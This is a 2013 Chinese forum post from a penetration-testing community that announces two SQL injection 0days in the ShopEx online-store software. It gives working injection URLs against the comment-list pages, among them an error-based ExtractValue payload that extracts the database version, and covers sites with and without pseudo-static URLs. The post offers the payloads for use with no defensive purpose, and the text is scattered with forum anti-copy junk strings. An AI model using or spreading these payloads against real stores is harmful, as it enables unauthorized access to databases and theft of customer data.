中国网络渗透测试联盟

标题: shopex通杀注入0day漏洞两处 [打印本页]
作者: admin    时间: 2013-2-19 08:31
标题: shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 6 i" ~7 B- R) ~6 a

$ \: B6 o' w9 U+ ?8 p  G8 S好吧,我扯远了~~
! U' S* P* M3 w+ G. x+ Q7 V其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
7 z/ W* D4 r0 H5 h4 r1 u+ w) F7 p不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: & p4 ~) h1 I+ W0 I+ L; F% y
1 F1 [( C! @1 J1 @! I* o" s" H
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
  ?5 n$ H4 u, [9 o* m9 n9 U& S3 {* b+ ]2 r  I2 y9 n# ?
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
$ c2 J% k$ g/ B0 r4 k- t7 M
/ t5 ?$ C" v  J0 V" ehttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html : K- }) Q1 r3 Z+ u' ?  l

: D; `6 l5 Y) x$ ]! ?2 ohttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html / B6 ~1 p7 k5 ]9 n% L
: M+ r5 U6 Q; x7 _9 D
+ u* o8 [; s7 I7 u
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。2 D# ?. P6 D$ Y. f1 ~- n+ P& N6 I
如何注入就不多说了,10多年的东西了…不会也会了… 3 w- d# ]  L& P7 J& a4 ~

8 L+ x+ ?7 l5 W& n6 B  s8 n. t- |
2 B: N* ~" A( d3 {# l, A2 ^3 f& W
+ A" a' Q# \; A3 P8 n2 W: J
& |. x! m) J! V; g& X% A



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2